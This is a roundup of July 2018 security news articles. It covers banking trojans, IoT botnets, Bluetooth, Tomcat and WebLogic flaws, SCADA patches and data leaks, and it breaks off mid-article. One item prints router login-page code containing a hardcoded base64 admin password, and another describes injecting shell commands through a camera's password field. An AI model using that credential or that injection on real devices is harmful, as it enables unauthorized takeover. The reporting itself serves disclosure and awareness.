The new Kronos samples, which were observed in campaigns targeting users in Germany, Japan, and Poland, are connecting to a command and control (C&C) domain on the Tor network. There’s also speculation that the malware might have been rebranded to Osiris, but no hard evidence on this has emerged so far.

The first campaign carrying the new Kronos samples was observed on June 27, targeting German users with malicious documents attached to spam emails. The documents carried macros to download and execute the malware and the SmokeLoader Trojan downloader was used in some cases.

Targeting Japan, the second campaign was observed on July 13 and involved a malvertising chain. Malicious ads took users to a site where JavaScript injections redirected to the RIG exploit kit, which delivered SmokeLoader. The downloader would then drop Kronos onto the compromised machines.

The Poland campaign started on July 15 and involved fake invoice emails carrying malicious documents that attempted to exploit CVE-2017-11882 (the Equation Editor vulnerability) to download and execute Kronos.

The Kronos samples observed in all three campaigns were configured to use .onion domains for C&C purposes. The researchers also observed that webinjects were used in the German and Japanese campaigns, but none was seen in the attacks on Poland.

A fourth campaign observed on July 20 appeared to be work in progress. The Kronos samples were once again configured to use the Tor network and a test webinject was spotted.

The 2018 Kronos samples feature extensive code and string overlap with the older versions, abuse the same Windows API hashing technique and hashes and the same string encryption technique, leverage the same webinject format, and feature the same C&C encryption mechanism and C&C protocol and encryption.

The C&C panel file layout is also similar to the older variants and a self-identifying string is also present in the malware. The major change, however, is the use of .onion C&C URLs and the Tor network to anonymize communications.

There is also some evidence to suggest that the malware might have been rebranded to Osiris (the Egyptian god of rebirth).

The new malware is being advertised on underground forums as packing capabilities that overlap with those observed in the new version of Kronos and as having about the same size (at 350 KB), and the researchers also observed a filenaming scheme in Kronos that appears to suggest a connection with Osiris.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape. […] While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,” Proofpoint concludes.


Twitter Curbs Access for 143,000 Apps in New Crackdown
26.7.2018 securityweek
Social

Twitter said Tuesday it had removed more than 143,000 apps from the messaging service since April in a fresh crackdown on "malicious" activity from automated accounts.

The San Francisco-based social network said it was tightening access to its application programming interfaces (APIs) that allows developers to make automated Twitter posts.

"We're committed to providing access to our platform to developers whose products and services make Twitter a better place," said Twitter senior product management director Rob Johnson.

"However, recognizing the challenges facing Twitter and the public -- from spam and malicious automation to surveillance and invasions of privacy -- we're taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter."

Johnson offered no details on the revoked apps, but Twitter has been under pressure over automated accounts or "bots" which spread misinformation or falsely amplify a person or political cause.

"We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter," he said.

"We're continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently."

As of Tuesday, any developer seeking access to create a Twitter app will have to go through a new application process, providing details of how they will use the service.

"We're committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service," Johnson said.

Automated accounts are not always malicious -- some are designed to tweet our emergency alerts, art exhibits or the release of a Netflix program -- but "bots" have been blamed for spreading hoaxes and misinformation in a bid to manipulate public opinion.


Chrome Now Marks HTTP Sites as "Not Secure"
26.7.2018 securityweek Security

The latest version of Google's Chrome web browser (Chrome 68) represents another step the search giant is making toward a more secure web: the browser now marks HTTP sites as “Not Secure.”

The change comes three and a half years after the Chrome Security Team launched the proposal to mark all HTTP sites as affirmatively non-secure, so as to make it clearer for users that HTTP provides no data security.

When websites are loaded over HTTP, the connection is not encrypted, meaning not only that attackers on the network can access the transmitted information, but also that they can modify the contents of sites before they are served to the user.

HTTPS, on the other hand, encrypts the connection, meaning that eavesdroppers can’t access the transmitted data and that user’s information remains private.

Google, which has been long advocating the adoption of HTTPS across the web, is only marking HTTP pages with a gray warning in Chrome. Later this year, however, the browser will display a red “Not Secure” alert for HTTP pages that require users to enter data.

The goal, however, is to incentivize site owners to adopt HTTPS. For that, Google is also planning on removing the (green) “Secure” wording and HTTPS scheme from Chrome in September 2018.

This means that the browser will no longer display positive security indicators, but will warn on insecure connections. Starting May 1, Chrome is also warning when encountering certificates that are not compliant with the Chromium Certificate Transparency (CT) Policy.

“To ensure that the Not Secure warning is not displayed for your pages in Chrome 68, we recommend migrating your site to HTTPS,” Google tells website admins.

According to Google’s Transparency Report, HTTPS usage has increased considerably worldwide, across all platforms: over 75% of pages are served over an encrypted connection on Chrome OS, macOS, Android, and Windows. The same applies to 66% of pages served to Linux users.

To help site admins move to HTTPS, the Internet giant has published a migration guide that includes recommendations and which also addresses common migration concerns such as SEO, ad revenue and performance impact.

In addition to marking HTTP sites as Not Secure, Chrome 68 includes patches for a total of 42 vulnerabilities, 29 of which were reported by external researchers: 5 High severity flaws, 19 Medium risk bugs, and 5 Low severity issues.

The 5 High risk issues include a stack buffer overflow in Skia, a heap buffer overflow in WebGL, a use after free in WebRTC, a heap buffer overflow in WebRTC, and a type confusion in WebRTC.

The remaining flaws included use after free, same origin policy bypass, heap buffer overflow, URL spoof, CORS bypass, permissions bypass, type confusion, integer overflow, local user privilege escalation, cross origin information leak, UI spoof, local file information leak, request privilege escalation, and cross origin information leak.


Car Sharing Apps Vulnerable to Hacker Attacks: Kaspersky
26.7.2018 securityweek
Vulnerebility

Researchers at Kaspersky Lab have analyzed over a dozen mobile applications provided by car sharing companies and discovered serious security holes that can be exploited to obtain personal information and even steal vehicles.

The security firm’s employees have investigated a total of 13 car sharing apps for Android. The targeted applications are used in the U.S., Europe and Russia, and they have been downloaded more than 1 million times from Google Play.

Car sharing applications can be a tempting target for malicious actors for several reasons. They could hijack the legitimate user’s account in order to drive cars without actually paying for them, steal vehicles for their parts or to commit crimes, track users’ locations, and obtain the account holder’s personal information.

While some of these are theoretical risks, Kaspersky pointed out that cybercriminals are already selling hijacked car sharing accounts. The sellers claim these accounts can be useful for several things, including for driving a car without a license.

Researchers first checked to see if the applications can be reverse engineered and if they can be executed with root privileges. Failure to prevent unauthorized individuals from reverse engineering an application increases the risk of someone creating a malicious version of the app. Allowing an app to run on a rooted device enables an attacker to access sensitive information.

Only one of the apps had reverse engineering protections in place, but it did not prevent execution on a rooted device. On the other hand, the app in question did encrypt sensitive data, which mitigates the risk introduced by allowing it to run with elevated privileges.

Kaspersky also verified the strength of the passwords protecting car sharing accounts. Experts found that in many cases developers set weak passwords or provide users short one-time verification codes. This, combined with the lack of a limitation mechanism for the number of login attempts, makes it easier to launch brute-force attacks and obtain a password or one-time code.

Brute force attack on car sharing app

The users of car sharing apps can often be identified on social media – it’s not uncommon for them to post pictures while driving and use a specific hashtag – and they often unwittingly expose their phone number on these websites.

Phone numbers are important for attackers as this piece of information can represent the username and it’s where the car sharing company sends one-time passwords.

Researchers also noticed that while the applications use HTTPS for communications with the server, they all fail to check the server’s certificate, making it easier to launch man-in-the-middle (MitM) attacks and intercept potentially sensitive data.

Finally, experts checked if the apps include any overlay protections. Specifically, they verified if developers implemented any mechanisms that would prevent attackers who already have access to a smartphone from showing a fake window (i.e. a phishing page) on top of the legitimate car sharing application. Unfortunately, none of the tested apps protect users against this threat.

Kaspersky has not named any of the tested applications, but did point out that the ones made by companies in the U.S. and Europe are more secure than the ones of Russian firms.

“Our research concluded that, in their current state, applications for car sharing services are not ready to withstand malware attacks,” explained Victor Chebyshev, security expert at Kaspersky Lab. “While we have not yet detected any cases of sophisticated attacks against car sharing services, cybercriminals understand the value that such apps hold, and existing offers on the black market point to the fact that vendors do not have much time to remove the vulnerabilities.”


Big Tech Firms Agree on 'Data Portability' Plan
26.7.2018 securityweek IT

Facebook, Google, Microsoft and Twitter unveiled plans Friday to make it easier for users to take their personal data and leave one online service for another.

The "Data Transfer Project" revealed by the companies responds to concerns about the growing influence of internet platforms and internet user concerns about control of their personal information shared online.

"Users should be in control of their data on the web, part of this is the ability to move their data," the companies said on the project website.

Data portability has been a goal of many privacy activists, and is enshrined in some country regulations including Europe's new General Data Protection Regulation.

Currently, people can download their data from an online service, without a guarantee it will be possible or feasible to upload the information to a new service.

The situation can result in people feeling anchored to a service or app, even if they are unhappy with it or an enticing option arises, because of photos, contacts, posts and other accumulated data.

"Making it easier for individuals to choose among services facilitates competition, empowers individuals to try new services and enables them to choose the offering that best suits their needs," the project said at its website.

"There are many use cases for users porting data directly between services, some we know about today, and some we have yet to discover."

Reasons for shifting personal data could include abandoning an old service, trying a new one, or simply backing up information to keep it safe.

The project was formed two years ago and remains in a development phase.

Disclosure of the effort comes amid heightened scrutiny over the potential of internet companies to abuse positions of power and the right of people to control their online data.


Hide ‘N Seek botnet also includes exploits for home automation systems
25.7.2018 securityaffairs
Vulnerebility

Security experts from Fortinet have discovered that the Hide ‘N Seek botnet is now targeting vulnerabilities in home automation systems.
The Hide ‘N Seek botnet was first spotted on January 10th when it was targeting home routers and IP cameras.

It was first spotted on January 10th by malware researchers from Bitdefender then it disappeared for a few days, and appeared again a few week later infecting in less than a weeks more than 20,000 devices.

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

In May the botnet infected over 90,000 unique devices, recently researchers from Qihoo 360’s NetLab discovered the bot was also targeting AVTECH webcams, Cisco Linksys routers, OrientDB and CouchDB database servers.

Hide â?˜N Seek timeline

Fortinet experts have compared three different versions of the bot across the time.

The security firm reports that the latest version of the bot has a configuration composed up of 110 entries and 9 exploits.

“We can easily spot the difference between them simply by the number of entries each one has. We are particularly interested in the exploits that each version is using.” states Fortinet.

“The first variant, as shown below, has a configuration made up of 60 entries that includes 2 exploits, the second has 81 entries and 6 exploits, while the most recent now has 110 entries and 9 exploits.”

Hide ‘N Seek authors recently included an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability, the malicious code allows the botnet to target devices in smart homes controller by the HomeMatic central unit.

The bot also includes the exploit for an RCE issue in the Belkin NetCam devices.

The experts believe the author of the Hide ‘N Seek botnet will continue to improve the bot by adding new exploits to target a broad range of devices.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits

“HNS has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet concludes.

“With this new understanding of this malware’s recent behaviour we expect the next alterations to include more functions as well as the usage of publicly available exploits.”


CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic
25.7.2018 securityaffairs
Vulnerebility

Security researchers have found a high severity flaw (CVE-2018-5383) affecting some Bluetooth implementations that allow attackers to manipulate traffic.
Security researchers at the Israel Institute of Technology have found a high severity vulnerability affecting some Bluetooth implementations that could be exploited by an unauthenticated remote attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.

The issue tracked as CVE-2018-5383 affects the Secure Simple Pairing and LE Secure Connections features, it affects firmware or drivers from some major vendors including Apple, Broadcom, Intel, and Qualcomm.

The Bluetooth specifications recommend that devices supporting the above features validate the public key exchanged during the pairing process.

Experts from Bluetooth Special Interest Group (SIG), the group that oversees the development of Bluetooth standards, explained that some vendors do not implement public key validation.

Basically, a nearby attacker can launch a man-in-the-middle (MitM) attack and obtain the encryption key, then it can monitor and manipulate the traffic exchanged by the devices.

“For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure.” reads the advisory published by the Bluetooth SIG explained.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,”

CVE-2018-5383 Bluetooth

The Bluetooth SIG has addressed the vulnerability by updating the specification, now it is mandatory for products to implement public key validation during the pairing process.

Moreover, the Bluetooth SIG has also added testing for this vulnerability within its Bluetooth Qualification Process.

The CERT/CC published a security advisory on the flaw that includes technical details.

“Bluetooth firmware or operating system software drivers may not sufficiently validate elliptic curve parameters used to generate public keys during a Diffie-Hellman key exchange, which may allow a remote attacker to obtain the encryption key used by the device.” reads the advisory published by the CERT/CC.

According to the Bluetooth SIG, there is no evidence that the CVE-2018-5383 flaw has been exploited attacks in the wild.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” added the Bluetooth SIG.

Both Apple and Intel have rolled out security patches to address the CVE-2018-5383 vulnerability.

According to Intel, the vulnerability affects the Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families.

The vendor has already rolled out both software and firmware updates to fix the issue.

According to Broadcom, some of its products supporting Bluetooth 2.1 or newer technology may be impacted, it also added that security fixes were already provided to OEM customers.


Apache Software Foundation fixes important flaws in Apache Tomcat
25.7.2018 securityaffairs
Vulnerebility

The Apache Software Foundation has rolled out security updates for the Tomcat application server that address several flaws.
The Apache Software Foundation has released security updates for the Tomcat application server that address several vulnerabilities, including issues that trigger a denial-of-service (DoS) condition or can lead to information disclosure.

Apache Tomcat is an open-source Java Servlet Container that implements several Java EE specifications including Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket, and provides a “pure Java” HTTP web server environment in which Java code can run.

It has been estimated that Tomcat has a market share of over 60 percent.

The first flaw addressed by the Apache Software Foundation is the CVE-2018-8037, it is an important bug in the tracking of connection closures that can lead to reuse of user sessions in a new connection.

The flaw affects Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Tomcat 9.0.10 and 8.5.32 releases address the vulnerabilities.

Another important issue addressed by the Foundation is the CVE-2018-1336, it is an improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder triggering a Denial of Service condition.

The vulnerability affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x.

Versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90 addresses the vulnerability.

The Apache Software Foundation also fixed a low severity security constraints bypass tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the security advisory.

The vulnerability has been addressed with the release of the latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x versions.

The US-CERT has released a security alert that urges users to apply security updates.

“The Apache Software Foundation has released security updates to address vulnerabilities in Apache Tomcat versions 9.0.0.M9 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.” reads the security advisory published by the US-CERT.

“NCCIC encourages users and administrators to review the Apache security advisories for CVE-2018-8037 and CVE-2018-1336 and apply the necessary updates.”

Apache Tomcat vulnerabilities are less likely to be exploited in the wild.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution .


The Death botnet grows targeting AVTech devices with a 2-years old exploit
25.7.2018 securityaffairs BotNet

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.
A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape, its author that goes online with the moniker EliteLands is gathering unpatched AVTech devices in the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers, it is the largest public-listed company in the Taiwan surveillance industry.

EliteLands is using a 2-years old exploit that could be used to trigger tens of well-known vulnerabilities in the AVTech firmware. Many products of the vendor currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav who discovered the Death botnet revealed that outdated firmware versions expose the passwords of the AVTech device in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability for the password field, this means that the attacker can provide a shell command in this field to get it executed and take over the devices.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, the Hide ‘N Seek (HNS) botnet, started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands gathering devices for his Death botnet by targeting exposed devices with different payloads for the password field.

The latest version of payload used by EliteLands is adding accounts with a lifespan of five minutes that execute his payload and then is deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted the EliteLands who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was orginally just to ddos but I have a greater plan on it soon. I dont really use it for attacks only to get customers aware of the power it has.”


Korean Davolink routers are easy exploitable due to poor cyber hygene
25.7.2018 securityaffairs
Exploit

Davolink dvw 3200 routers have their login portal up on port 88, the access is password protected, but the password is hardcoded in the HTLM of login page.
The story started in 2018 when Anubhav noticed a very basic flaw the routers of the Korean vendor Davolink.

These Davolink dvw 3200 routers have their login portal up on port 88, the access is password protected.

Analyzing the code of the page the expert has noticed a function named “clickApply” that included the password in standard base 64 coding.

function clickApply(sel)
{
var user_passwd="YWRtaW4=";
var super_passwd="(null)";
document.forms[0].http_passwd.value = encode(document.forms[0].tmp_http_passwd.value);

Davolink dvw
Scanning the Internet for similar devices using the search engine Zoomeye, he discovered more than 50 routers in Korea are exposed only and are accessible providing the hardcoded password.
Davolink
The expert reported the issue to the vendor that quickly acknowledged it and responded that they have discontinued the product. The vendor added that a working patch is already available.

The expert published the exploit code on exploit-db.

“Many IoT vendors are not doing the basics right as keeping the password in the HTML source, it is a very basic security issue” concluded Anubhav

“and it is a relevant issue as users in Korea are using it”


Gigamon Acquires Network Visibility Startup ICEBRG

24.7.2018 securityweek IT

Network traffic analysis firm Gigamon on Tuesday announced plans to acquire network security startup ICEBRG.

Founded in 2014, Seattle, Washington-based ICEBRG provides a Security-as-a-Service (SaaS) solution designed to help organizations detect threats and gain and leverage network visibility for security operations.

Gigamon's flagship GigaSECURE platform provides visibility into network traffic, users, applications and suspicious activity.

The ICEBRG platform uses sensors deployed at customer locations that stream network traffic metadata to a cloud-based system that helps Security Operations Center (SOC) teams quickly identify threats and act to remediate them.

Gigamon says it will combine the two platforms to help enterprises leverage various security tools.

“The combination of the high-quality network data from the GigaSECURE Security Delivery Platform and the ICEBRG cloud-based platform will power the next generation of security capabilities. Together, our expertise in networking and security will help SOC teams focus on defending against the most severe threats in their environments,” William Peteroy, co-founder and CEO of ICEBRG, said.

The terms of the deal were not disclosed.


Data Leak at Robotics Firm Exposes Global Manufacturers
24.7.2018 securityweek Incindent

A publicly accessible server belonging to robotics vendor Level One Robotics and Controls, Inc. contained sensitive documents connected to more than one hundred manufacturing companies.

Established in 2000, the engineering service provider offers automation process and assembly for OEM’s, Tier 1 automotive suppliers, and end users, delivering services such as project management, design, integration, debug, and training.

The exposed server was discovered by UpGuard Cyber Risk team earlier this month. It contained 157 gigabytes of data, including documents, schematics, and other information belonging to the provider’s customers and employees.

The exposed data included “over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements,” the security firm reveals.

Specifications and use of the machines, as well as animations of the robots at work, customer contact details, and ID badge request forms were also found on the server.

Level One customers impacted by the data exposure include divisions of VW, Chrysler, Ford, Toyota, GM, Tesla and ThyssenKrupp.

The server also contained data belonging to organization’s employees, such as scans of driver’s licenses and passports and other identification. Level One business data was also exposed, including invoices, prices, contracts, typical business documents, and bank account details (including account and routing numbers, and SWIFT codes).

“The sheer amount of sensitive data and the number of affected businesses illustrate how third and fourth-party supply chain cyber risk can affect even the largest companies,” the security firm notes.

UpGuard says the data was exposed via rsync, the file transfer protocol commonly used for large data transfers. The researchers discovered that access to the server wasn’t restricted by IP or user and that the data was downloadable to any rsync client that connected to the rsync port.

“This is the same type of administrative error we continue to see over and over again both on-premise as well as in the cloud. Until organizations wholly operationalize security into their development lifecycle, we will likely continue to see similar data exposure from non-malicious insiders,” Matt Chiodi, VP of Cloud Security at RedLock, told SecurityWeek in an emailed commentary.

Discovered on July 1, 2018, the exposed rsync server was established to belong to Level One several days later. The company was successfully informed on the issue on July 9 and closed the exposure by the next day.

“The fact that this kind of breached happened and data from so many big players was involved goes to show that anyone can be a victim if third parties are not continuously vetted. It is no longer enough for companies to maintain trust through a one-time or annual audit. Big players should demand a transparent and ongoing demonstration of security controls in action,” James Lerud, head of the Behavioral Research Team at Verodin, said in an emailed commentary.


Recently Patched Oracle WebLogic Flaw Exploited in the Wild
24.7.2018 securityweek
Vulnerebility

At least two threat groups have started exploiting a critical Oracle WebLogic vulnerability patched earlier this month. The attacks began shortly after several proof-of-concept (PoC) exploits were made public.

The vulnerability, tracked as CVE-2018-2893 and assigned a CVSS score of 9.8, allows an unauthenticated attacker to remotely take control of a WebLogic Server. The flaw affects the product’s WLS Core Components subcomponent and it can be exploited via the T3 transport protocol.

The security hole impacts versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3, and it was addressed by Oracle with its July 2018 Critical Patch Update (CPU).

Oracle has credited five different researchers for independently reporting the flaw, and one of the experts already claims to have found a way to bypass the vendor’s patch.

Shortly after Oracle announced the latest security updates on July 18, several individuals released PoC exploits on GitHub and other websites.

The Netlab group at Chinese security company Qihoo 360 reported seeing the first attacks on July 21. The campaign used luoxkexp[.]com as its main command and control (C&C) server.

According to NetLab, the domain was registered in March 2017 and hackers have been using it ever since. The group that owns the domain, tracked by NetLab as luoxk, has been using it for campaigns involving DDoS bots, RATs, cryptocurrency mining, malicious Android APKs, and worm-style exploits with the Java RMI (Remote Method Invocation) service.

In the attacks involving CVE-2018-2893, the hackers delivered the XMRig Monero miner and the Bill Gates DDoS malware.

SANS has also tracked attacks exploiting CVE-2018-2893 and the organization has seen attempts to install what appears to be a backdoor.

It’s not uncommon for malicious actors to target Oracle WebLogic vulnerabilities in their attacks, with several campaigns spotted over the past months.

While Oracle has been busy developing patches for these flaws, researchers have managed to find ways to bypass the fixes.

Comments on Oracle WebLogic security


Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.2018 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations affect new digital technology can be seen by 44% of respondents claiming that compliance is the biggest priority when implementing a new digital technology, with 36% saying that speed of implementation is the prime priority. User adoption of that technology ranks second to last (30%), worsened only by the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."


AVEVA Patches Critical Flaws in HMI/SCADA Tools Following Schneider Merger
24.7.2018 securityweek
Vulnerebility

UK-based industrial software company AVEVA has patched two critical remote code execution vulnerabilities discovered by researchers in its InTouch and InduSoft development tools.

AVEVA merged with Schneider Electric earlier this year and took over the France-based industrial giant’s Avantis and Wonderware brands. The Wonderware portfolio includes the InduSoft Web Studio and InTouch Machine Edition HMI/SCADA software.

George Lashenko, a researcher with industrial cybersecurity firm CyberX, discovered that some versions of InTouch 2014 and 2017 are affected by a critical stack-based buffer overflow vulnerability. The flaw is tracked as CVE-2018-10628 and it has been assigned a CVSS score of 9.8.AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

“InTouch provides the capability for an HMI client to read and write tags defined in a view. A remote unauthenticated user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability with potential for code to be executed while performing a tag-write operation on a locale that does not use a dot floating point separator. The code would be executed under the privileges of the InTouch View process and could lead to a compromise of the InTouch HMI,” AVEVA wrote in its advisory.

David Atch, VP of research at CyberX, told SecurityWeek that the vulnerability can be exploited remotely from the Internet if the targeted system is exposed to the Web. The attacker can take control of the HMI by directly sending it specially crafted packets, but the attack can also involve a piece of malware designed to send the malicious packets to the HMI.

“This provides the attacker with full control of the ICS process, enabling them to manipulate process parameters and potentially cause destructive actions like allowing pressure or temperature in a mixing tank to rise above acceptable levels,” Atch explained.

AVEVA released InTouch 2017 Update 2 HF-17_2 /CR149706 and InTouch 2014 R2 SP1 HF-11_1_SP1 /CR149705 on July 13 to patch the vulnerability.

AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

Separately, researchers at Tenable discovered another critical remote code execution vulnerability. The security hole, tracked as CVE-2018-10620 with a CVSS score of 9.8, impacts both InTouch Machine Edition and InduSoft Web Studio.

“InduSoft Web Studio and InTouch Machine Edition provide the capability for an HMI client to read, write tags and monitor alarms and events. A remote user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. The code would be executed under the privileges of the Indusoft Web Studio or InTouch Machine Edition runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Machine Edition server machine,” AVEVA said in its advisory.

The company patched the flaw on July 13 with the release of Hotfix 81.1.00.08 for each of the impacted products.

“These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks,” Tenable said in a blog post, which includes technical details and a PoC exploit.

The flaw is similar to one disclosed by Tenable in early May, but it’s triggered via a different command.


Security Orchestration Firm Siemplify Raises $14 Million
24.7.2018 securityweek IT

Siemplify, a New York, NY-based provider of security orchestration, automation and response (SOAR) tools, today announced that it has raised $14 million in a Series B funding round led by Jump Capital.

This latest funding brings the total amount raised by the company to $28 million.

Designed to help security operations teams work more efficiently, Siemplify’s platform assists with tasks ranging from incident triage and investigation to collaboration and remediation.

“SOAR enables the management of disparate cybersecurity tools - including SIEM, endpoint protection, threat intelligence and more - through a single platform that helps security operations teams respond to threats faster and more effectively,” the company explains.

Jump Capital was joined by the company’s existing investors G20 Ventures and 83North in the Series B round.

Siemplify is yet another cybersecurity startup founded by former Israeli Defense Forces (IDF) security experts.


Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency
24.7.2018 securityaffairs Android  Cryptocurrency

It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.
In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.

Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.

The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb.) According to the Google developer portal,

